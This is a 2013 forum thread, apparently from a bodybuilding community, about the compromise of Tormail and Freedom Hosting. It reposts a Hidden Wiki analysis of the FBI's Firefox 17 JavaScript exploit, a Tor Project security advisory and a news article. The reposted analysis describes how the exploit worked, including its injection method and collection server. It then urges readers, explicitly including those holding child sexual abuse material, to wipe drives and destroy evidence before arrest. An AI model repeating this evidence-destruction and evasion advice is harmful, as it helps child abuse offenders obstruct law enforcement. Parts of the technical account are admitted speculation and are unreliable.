©ALL CONTENT OF THIS WEBSITE IS COPYRIGHTED AND CANNOT BE REPRODUCED WITHOUT THE ADMINISTRATORS CONSENT 2003-2020



Tormail has been compromised !!!

chicken_hawk

AnaSCI VIP
Feb 2, 2013
1,634
0
0
As almost anyone with a Tormail account has observed, the service has been inaccessible for the last 3 days or so.

Some people commented that it appeared that Freedom Hosting was either down or under attack, as many .onion sites were also down. As it turned out, it has been reported on Reddit as well as in the Irish newspaper The Independent that the founder of Freedom Hosting has been arrested on child pornography related charges and is currently awaiting extradition to the United States.

Some of you may remember that, about a year or so ago, Anonymous was making allegations that Freedom Hosting was was hosting sites that contained child pornography; it would now appear that those allegations may have had some degree of substance to them.

While the exact state of affairs is unclear, it would now seem that Tormail was, in fact, hosted by Freedom Hosting. As such, it is only prudent to assume the following:

1) Tormail will not becoming back up. Should the service, in fact, come back up, I would be extremely wary of using it.

2) You have to assume that all non-encrypted email is now in the hands of the authorities.

3) Even for those accounts for which the mail is encrypted, the authorities will likely still be conducting a relationship analysis, to see who is talking to whom and about what (as evidenced by the Subject: lines.)

Hopefully, any of you who have used Tormail also used PGP to encrypt the email contents.

Founder of the Freedom Hosting arrested, held without bail in Ireland, awaiting extradition to the USA : onions

FBI bids to extradite 'largest child-porn dealer on planet' - Independent.ie

Mirrorshades
 

chicken_hawk

AnaSCI VIP
Feb 2, 2013
1,634
0
0
The Hidden Wiki discussion page has the most comprehensive explanation of the attack that I've found. The only part I don't agree with, simply because there is no evidence, is the claim that the FH admin was identified through bitcoin cashing out. It is factually incorrect that Onion Bank was started months ago. It was started like 10 days before the bust. However, the FH admin may have been accepting private bitcoin donations, particularly from the CP site operators and users. After all, someone was paying the bills to keep the site running. It's possible that the FBI made a donation and tracked the payment, and if the FH admin didn't take proper precautions in cashing out, he was identified that way. All this will come out in the discovery during his court case.

I do agree that the compromise of Tormail accounts could be very bad for some members of our community, especially if they didn't encrypt their emails and routinely delete read emails from the server.

Here's the Hidden Wiki discussion of the attack.

1. It runs only if Javascript was enabled and affects Firefox 17 on Windows. The exploit used (MFSA 2013-53) and was fixed in Firefox 17.0.7 which is the one used in the latest Tor Browser Bundle, and relies on Windows libraries to execute its payload. If you were using an outdated Tor Browser on Windows and you had Javascript enabled (it is by default) then you have definitely been compromised. If you were using Tor on any other OS, had disabled Javascript, or had the latest version of the Tor Browser Bundle (Torbrowser - Help - About shows the version, which must be 17.0.7 or higher) then you are safe and your public IP has not been transmitted anywhere.

2. The exploit has only been online since after the servers came back on August 3rd, 2013. Now read on for the details...
By default, the Tor Browser comes with NoScript set to "Allow All Javascript Globally", meaning that Javascript is enabled by default. They do this to make it convenient for users which is why it's the default setting even though it's not safe.

3. If you were running an exploitable version of the Tor Browser on Windows and didn't either manually set NoScript to "Forbid Javascript Globally" or disabled Javascript entirely via the Firefox settings, then you are absolutely 100% busted. But if you had disabled Javascript like smart people kept telling you, using either of the two methods mentioned, then the code never executed and you are safe.

4. The FreedomHosting compromise consisted of a small, non-existent image <img> tag injected into all Freedom Hosting sites, and this <img> tag contained an <img onerror=""> event attribute. The fact that the image was missing meant that the "onerror" code ran and retrieved the rest of the code from another Onion site. They did it this way via a small, hidden image to avoid drawing attention to any obvious <script> tags.

5. The main payload (main exploit code) from that onion site then created an iframe and set a cookie in it (the sole purpose of which was to reliably identify your unique browser as you traveled between different compromised FH sites, to build a list of which FH sites you've been visiting) and more importantly ran some 0-day exploits using heap overflows to run any code they desired and escape the Tor sandbox.

6. The 0day exploit code executed some functions that revealed your public internet IP address, MAC address, local hostname (such as "LarrysPC") and what Freedom Hosting site you were browsing (they used a unique UDID for each compromised website) and sent it all to a clear-net IP in Washington. This is no joke. I wish I was kidding. It really did this! They transmit your unique browser ID (cookie value) over the clear internet to their public-internet server, thus giving them a physical person tied to the "random person" they've been observing browsing the different FH sites. With this connection performed, they know your public IP, they have the computer's hostname & MAC address to conclusively identify your computer, they have your unique browser ID cookie, and they have a full list of Freedom Hosting sites that have been viewed by that unique browser. They know exactly how deeply you are involved and their lists allow them to target the people that are clearly intentionally seeking out illegal content.

7. The use of 0day exploits means that the attacker had the huge resources required to find such completely new exploits, and is therefore most likely the government.

8. The fact that FreedomHosting was compromised means that the attacker either physically seized the servers and installed the code (government), or managed to exploit the webserver software (other malicious attacker). Considering recent news reports, it is clear that it was the government.

9. The fact that the clear-net IP collecting all the data is in Washington and that FreedomHosting is now down without a word suggests that the attacker was in fact the FBI.

10. The attacker now has the public IP addresses + what FreedomHosting site you were viewing of everybody that had Javascript enabled on Windows with an outdated Tor Browser Bundle. You better prepare to be raided. Destroy all the evidence now, if your freedom depends on it.

11. The cookie is called "n_serv" and can be viewed under Tor Button - Cookie Protections. By default, Tor is set to erase all non-protected cookies on browser restarts (and to make all cookies non-protected unless explicitly told by the user to protect certain cookies). This means that the "n_serv" cookie will not persist between browser restarts, unless the FBI has made part of their exploit code tell Tor Button to protect the cookie. That is very unlikely, though, as it would be difficult to do so and wouldn't do them much good, since the cookie changing its value doesn't actually harm their operation. They will still get your public IP for every unique browser ID that's being transmitted to them, so it doesn't matter to them if the cookie gets cleared and the browser ID changes. Therefore, due to the fact that the cookie clears itself on restart, the only way to know if you've been affected if you're running a vulnerable browser bundle is if your browser has been running non-stop since before FreedomHosting went down. Meaning that your browser has been running for at least 1 week, preferably 2 or more. If you've got no "n_serv" cookie in a session that has lasted that long then you conclusively know that the exploits have never successfully executed on your machine. The cookie only clears on browser restart. I've always been using NoScript in "Forbid Javascript Globally" mode, my last browser restart was over 2 weeks ago and I am 100% sure I have browsed some FH sites before they went offline and without restarting this browser and I don't have the cookie. People that have either set NoScript to globally forbid, or disabled Javascript entirely in the Firefox settings, are therefore conclusively safe. Everyone else will have been infected and can check for the existence of that cookie to verify that fact (will only be there if their browser hasn't restarted in the past few weeks). Note that the cookie will be created if Javascript is enabled, but the exploit that transmits your public IP to tie that cookie to your identity is a separate action and will only run on exploitable (outdated) Tor Browser Bundles on Windows. Therefore, the existence of the cookie is not enough reason to panic yet. If you're using Windows and you've got a Javascript-enabled Tor Browser that's older than 17.0.7 then your identity has absolutely been compromised.

12. Previous news reports from July 29th, 2013 shows that the FBI performed a nationwide "child sex trafficking" bust, freeing 105 children and arresting 150 pimps/ring leaders (FBI — Operation Cross Country: Recovering Victims of Child Sex Trafficking).

13. Other news from July 29th, 2013 shows that the FBI is trying to extradite "the biggest child-porn facilitator on the planet" from Ireland (FBI bids to extradite 'largest child-porn dealer on planet' - Independent.ie). Seems that the FH admin was a 28 year old that was arrested in Ireland and that the javascript exploits were set up in a joint-operation between the FBI and the Irish law enforcement since all collected IPs were sent to the FBI. If this is the guy, then Freedom Hosting is never coming back, and he's looking at a lot of jailtime.

14. Also consider the fact that the attackers installed code that uniquely identifies each FreedomHosting site you were visiting, since FH served much more than just child porn. The FBI wouldn't want to bust down the doors of people that were looking at relatively harmless stuff from FreedomHosting. They really cared about knowing which specific sites you were viewing and took many steps to ensure that they accurately tracked which sites you visited, through the use of per-site UDIDs and a tracking cookie.

15. Timeline of events: FreedomHosting admin starts accepting BitCoins a few months ago. The FBI traces his BitCoin transactions to withdrawals into a real-world bank account via currency exchange services, thus revealing the identity of the FH admin, and an arrest is made on July 29th, 2013 in Ireland. The servers were then shut down. On August 3rd, 2013 the sites came back online with the exploit code installed.

Note by Mirrorshades: This is speculation -- I don' t think that anyone except those involved really knows how the FH admin was traced.

16. It is pretty conclusive: Get a fucking move on if you were too stupid to disable Javascript, keep Tor Browser Bundle updated, were running Windows, and visited any of the FH sites after they came back online. You do not have much time. Someone in Washington, otherwise known as the FBI, now has your public IP and a list of which FH sites you were browsing. GET A FUCKING MOVE ON! NOW! Destroy everything before you end up behind bars! Remember to run multiple secure wipe-passes of your entire hard drives so that NOTHING can be recovered, and remember that encryption alone is not safe enough, data leaks out of your encrypted containers into the operating system's thumbnail caches. They might not be able to view your actual encrypted TrueCrypt images, but they sure as hell can see what kind of images you had been looking at in the past (Windows has a global thumbnail database containing smaller versions of all Thumbs.db contents from every drive on the system, Mac OS has a QuickLook cache of everything you have ever viewed, and Linux has similar leaks depending on what image viewers you were using). Also remember that they can force you to give up encryption keys (and even sentence you harshly based on suspicion if you refuse to give it out), so it's definitely not safe to keep encrypted TrueCrypt containers. Your freedom should be worth more than that. Take no chances. Perform a full 3-pass random DBAN (Darik's Boot And Nuke | Hard Drive Disk Wipe and Data Clearing) format of ALL hard disks that were used for child porn AND ALL operating system disks related to that! We are on the verge of a global law-enforcement crackdown unlike anything else ever before once the FBI uses the data they have collected, and you may only have a few days until the knock comes. Don't waste time with 35-pass erases, it takes days and they may knock on the door sooner than it can finish and research shows that even a single-pass erase is safe enough, but if you are truly paranoid (even though you would not gain anything from it and would only waste more time) you could do 3 random passes just to be extra safe. Good luck everyone and may God be with you. Time to brace for impact. And remember that silence does not mean that nothing is going on. People that are getting busted won't have any time to connect to Tor and let others know they've been busted. Silence does not mean that busts are not taking place. The FBI is taking this FreedomHosting compromise as the biggest victory in human history. You should treat it with equal respect and do everything in your power to stay safe. This is the calm before the storm. You will see the victims being paraded around in a giant FBI press release within a month or two.

17. For those that had blocked Javascript and are safe: It's now a good idea to remember that Tor should never be trusted, and that any content from Tor sites can be compromised at any time. Always be sure to update your media players such as VLC to the latest versions to protect against exploits in media files. There are no signs that such tampering has taken place, but this is a good time to remind people to be smart. How to be as safe as you can be: 1: Keep Tor Browser Bundle up to date every time you get an update notification. 2: Always disable Javascript. 3: Always keep all your software fully updated. 4: Run everything in a Virtual machine (VirtualBox is free) to avoid data leaking out into your main OS. 5. Use Linux in that VM even if you are primarily a Windows user, because Linux is a fuckton more resilient against attacks. 6: Use encrypted containers inside the VM if your freedom depends on your data being safe from prying eyes. 7: Trust noone. Never reveal personal info on Tormail (now compromised) or even Torchat. You never want to leak anything that leads back to you. Always assume that everyone is out to get you and you will never have the issue of trusting the wrong person.

18. More warnings (TORMAIL): The hidden service for Tormail has been compromised since it ran on FreedomHosting. It's therefore very likely that all the contents of your Tormail inboxes are in their hands. Do not log into your accounts. Depending on how Tormail works, your emails might possibly have been stored in encrypted form in the database and will only be decrypted whenever you log in. In that case, they can only read them by installing a backdoor that makes unencrypted copies as soon as someone logs into their account. Logging in would thereby give them the unencrypted versions. Alternatively, if Tormail already stored everything unencrypted then they already have a complete copy of it and no logging-in-and-deleting will do any good whatsoever. Unfortunately everything points towards Tormail just using a regular IMAP mail server hosted on Freedom Hosting (because of how they allowed regular Roundcube / SquirrelMail access to your mailbox, both of which are just regular unencrypted IMAP web clients), and that would mean that all plaintext emails are already in the FBI's hands and there's nothing you can do about it. Do not log in. Logging in can only make things worse! Tormail is guaranteed to be a major part of this sting because it (along with certain private messaging systems on boards) is the most likely place where people will reveal their true identities to people they've trusted. Tormail has been compromised and all you can do now is NOT log in, and pray that everything was stored as decrypt-on-demand via custom IMAP server software (unfortunately extremely unlikely because no off-the-shelf IMAP servers offer encrypted email storage). That, and destroy all the evidence so that anyone knocking down your door will find nothing on your computers.

More information:

SUMMARY: This is a critical security announcement.

An attack that exploits a Firefox vulnerability in JavaScript [1]
has been observed in the wild. Specifically, Windows users using the
Tor Browser Bundle (which includes Firefox plus privacy patches [2])
appear to have been targeted.

This vulnerability was fixed in Firefox 17.0.7 ESR [3]. The following
versions of the Tor Browser Bundle include this fixed version:
2.3.25-10 (released June 26 2013) [4]
2.4.15-alpha-1 (released June 26 2013) [4]
2.4.15-beta-1 (released July 8 2013) [5]
3.0alpha2 (released June 30 2013) [6]

Tor Browser Bundle users should ensure they're running a recent enough
bundle version, and consider taking further security precautions as
described below.

WHO IS AFFECTED:
In principle, all users of all Tor Browser Bundles earlier than
the above versions are vulnerable. But in practice, it appears that
only Windows users with vulnerable Firefox versions were actually
exploitable by this attack.

(If you're not sure what version you have, click on "Help -> About
Torbrowser" and make sure it says Firefox 17.0.7. Here's a video: [7])

To be clear, while the Firefox vulnerability is cross-platform, the
attack code is Windows-specific. It appears that TBB users on Linux
and OS X, as well as users of LiveCD systems like Tails, were not
exploited by this attack.


https://lists.torproject.org/piperma...st/000089.html

Mirrorshades

P.S.: I should make it clear that I did not write the above posting, I merely copied and pasted it here for everyone's benefit.

Stay safe, everyone!
 

swolesearcher

AnaSCI VET
May 31, 2013
1,808
0
36
holy shit! i`m having this issues. i haven`t been able to log in my tormail in a week or more.. shit
 

AnaSCI

ADMINISTRATOR
Sep 17, 2003
8,625
18
38
An in-depth guide to Freedom Hosting, the engine of the Dark Net

Eric Eoin Marques, 28—the “largest facilitator of child porn on the planet,” according to the FBI—was recently arrested and is currently in an Irish jail awaiting the conclusion of his extradition trial. The FBI aims to bring Marques to trial in the United States. If convicted, Marques faces up to 30 years in prison.

Although the anonymous nature of Tor makes confirming identities difficult, all signs point to Marques being one of the most important men on the Dark Net: He’s allegedly the founder of Freedom Hosting, Tor’s most popular hosting service since it was created in 2008.

Freedom Hosting maintains servers for some of Tor’s most infamous websites, including TorMail, long considered the most secure anonymous email operation online; major hacking and fraud forums such as HackBB; large money laundering operations; the Hidden Wiki, which, until recently, was the de facto encyclopedia of the Dark Net; and virtually all of the most popular child pornography websites on the planet, the charge that has landed Marques in custody. Famous child pornography websites such as Lolita City, the Love Zone, and PedoEmpire were customers of Freedom Hosting.

While Marques’s Dark Net identity has not yet been confirmed by authorities, the FBI’s description of "largest facilitator of child porn on the planet” applies to the founder of Freedom Hosting more than anyone.

An Eric Marques runs an Irish hosting company called Host Ultra Limited, according to a SoloCheck.ie company report. He also owns an account on the webhostingtalk.com forum, where he made 785 posts, first discovered by gray hat hacker SHG.Nackt. On that forum, Marques promoted his business and solicited advice about anonymizing tools such as Virtual private networks.

“The charges [against Marques] relate to images on a large number of websites described as being extremely violent, graphic and depicting the rape and torture of pre-pubescent children,” reported The Independent.

Every Freedom Hosting website went down simultaneously at around 6:40am ET on Saturday morning, about the same time news of Marques’s arrest hit the Internet. If and when the websites have returned since the downtime, many have been infected with Javascript exploits that may be able to identify visitors by grabbing a user’s cookies, logins, and IP address to send “home”—which, in this case, is the Verizon-owned IP address 65.222.202.53. The previously unknown exploit only affects Firefox version 17, which is exactly the version Tor uses.

Freedom Hosting’s famously laissez faire terms of use stated that it does not give customers permission to upload any illegal files—but “if you chose to do so anyway, we are not responsible for your actions.” This was widely seen as winking permission to use the hosting without regard for the law of any land.

A Freedom Hosting account cost a one time fee of $5 or was free with an invite from an existing member. It offered unlimited space and bandwidth, an onion domain (“xxx.onion”), “Fast Network with 24/7 Uptime,” PHP and MySQL support with unlimited MYSQL databases, “No javascript or cookies required to login, Upload a zip with your files and extract on server, FTP Access, and Daily Snapshot Backups—Kept for 1 month.”

For five years, both law enforcement and hacktivist vigilantes seemed incapable of shutting down the largest child pornography services on the Internet—virtually all of which were Freedom Hosting customers—thanks to the technology provided by Tor. Today, all of the major websites hosted by Freedom Hosting are down or are suspected of having been infected with malicious code. No one is sure how Marques was tracked down.

An administrator of the famous 4Pedo forum noticed “unknown Javascript” on his own website on Saturday.

“Unknown Javascript in the board pages pointing to iframe to a Verizon server on the open web!” wrote 4Pedo’s owner. “They are inserted by Freedom Hosting! I would consider Freedom Hosting compromised! They are also in other TLZ and other site pages! Stay away from all Freedom Hosting sites including TLZ [The Love Zone], LC [Lolita City], TorMail, all of these are hosting on Freedom Hosting ! All boards have been deleted to protect you! If the boards come back up, it is not met running the site anymore! All admin/mod accounts have been deleted!”

The Javascript exploits now widely assumed to have originated from the FBI or Verizon have been posted publicly around the Web.



Freedom Hosting first gained mainstream attention in 2011 when Anonymous attempted to shut down the service and the child pornography websites it hosted using Distributed Denial of Service attacks in an offensive called Operation Darknet.

The story was a big public relations win for Anonymous, usually an extremely polarizing entity.

"It was the right thing to do. Period," wrote Ars Technica commenter Reflex-croft. "Too bad they can't focus all their efforts on stuff like this, it would be nice to be able to rally behind them unequivocally."

"kudos!... this is where you should be doing!" wrote astut945. "shutdown those child porn sites!"

The most popular child pornography website attacked, Lolita City, hosted 100 gigabytes of photos and video during the 2011 offensive.

The sites involved were disabled. IP logs were released and mapped. This proved that the websites were not invulnerable. Anonymous took a victory lap.

Anywhere from a few minutes to a little over a day later, the attacks ceased and the war was over. All the sites were restored.

By June 2013, Lolita City boasted 14,969 members and growing, 10 times its membership during Operation Darknet. The 100 gigabyte figure was shocking in 2011. By 2013, the website hosted over one million pictures and thousands of videos. The Anonymous offensive had actually provided major publicity for the child pornography sites and their patron, Freedom Hosting.

Operation Darknet involved some of Anonymous’s most notable members. Sabu (Hector Xavier Monsegur), the Bronx-based hacker, LulzSec founder and FBI informant was one of the principal organizers of Operation Darknet, leading many to wonder to what extent the FBI had knowledge of those Dark Net raids. Sabu became an FBI informant in August 2011 after pleading guilty to a dozen criminal counts, reported the New York Times. Operation Darknet was executed in October 2011.

The Real Sabu @anonymouSabu

#opDarkNet will be releasing logs of actual pedophiles utilizing Lolita City's services. 190 IPs from actual users of the site. And IP map.
11:37 PM - 1 Nov 2011

At the very least, the FBI was fully aware of the raids into the Dark Net and allowed them to proceed. The question is, who was directing the operation if Sabu was, at that point, a puppet doing the FBI’s bidding?



Before Operation Darknet, Freedom Hosting offered hosting to the public for a small price. After the Anonymous attacks, Freedom Hosting became a private, invite-only service for a full two-year period in order to protect itself. To become a Freedom Hosting customer, you had to be invited by someone who was already a customer.

This process is not as difficult as it sounds. Invites were handed out to anyone who so much as earned the respect of another customer. In fact, I earned a personal invite to Freedom Hosting earlier this year after one customer enjoyed the articles I’d written about the Dark Net. I politely declined the offer.

That said, Freedom Hosting invites have been highly prized for the full two years they’ve existed. Invites were common topics of conversations on every popular onion forum. Many members asked or even begged for invites while others offered money.

Last month, after two years, Freedom Hosting changed its policy drastically. The service’s founder said he’d always wanted to bring the service public once again but that he didn’t have an ecommerce platform secure enough to operate the risky business.

“I created Onion Bank,” announced the founder last month, “which has been in (slow) development for almost two years!”

The bank offered all the services of a normal bank plus escrow, merchant services, money laundering, and above all, the bank would handle everything anonymously. On the back of this Bank, Freedom Hosting went public once again, offering anonymous onion hosting to whomever could pay for it. The bank caught the attention of many prominent Dark Net businesses, but it’s impossible to say how widely it was adopted in its month of existence.

Freedom Hosting’s trademark promise was that it would never look in on websites under its care. Over several years, only a handful of public complaints were made that a Freedom Hosting administrator did look in but most forgave the eyeballing as necessary maintenance.

Freedom Hosting remained the most trusted and popular hidden service hosting business until yesterday’s seismic events.

There is no word on how the police identified and then apprehended Marques. Worried Tor users immediately wondered if the famously tough-to-crack technology had finally been solved by law enforcement. However, the fact that Freedom Hosting websites have been injected with malicious code suggests that law enforcement still cannot crack Tor outright and that they need to rely on other methods.

One possibility is that Marques was caught through social engineering techniques. Multiple anonymous sources say that, likely because they lack the capability to launch an effective technical offensive against Tor-protected targets, law enforcement has been on a steady social offensive against websites such as Freedom Hosting and the famous Tor black market Silk Road. There have been multiple unconfirmed reports—after all, almost any report from the Dark Net is unconfirmed—that important members of the Silk Road community have been contacted by law enforcement this year in an effort to find helpful intelligence and, ultimately, take down Silk Road and its founder, Dread Pirate Roberts.

After such a monumental bust on the Dark Net, the natural follow-up question has been asked and asked again: Is Silk Road next?



For running what may be a $45 million dollar per year black market, Dread Pirate Roberts can be considered in something of a tie with Freedom Hosting’s founder for the title of most wanted man on the Dark Net. While Freedom Hosting places no limit on what its customers can do. Roberts explicitly forbids the trading of child pornography on Silk Road, among other verboden items.

It’s not known how much progress law enforcement has made in their fight against Silk Road, which is self-hosted, a move made possible and necessary by the millions of dollars moving through the market. When contacted by journalists, various American law enforcement agencies have acknowledged that they are aware of Silk Road but have let on little else. It's commonly accepted that police are closely monitoring the black market and its forums.

On the Tor Talk email list, members have noted a “very large drop in the number of onions,” which is what Tor websites are called due to the multiple layers of protection they provide. Some are estimating that half of all onion sites were hosted on Freedom Hosting. This event could add up to thousands of total hidden services lost.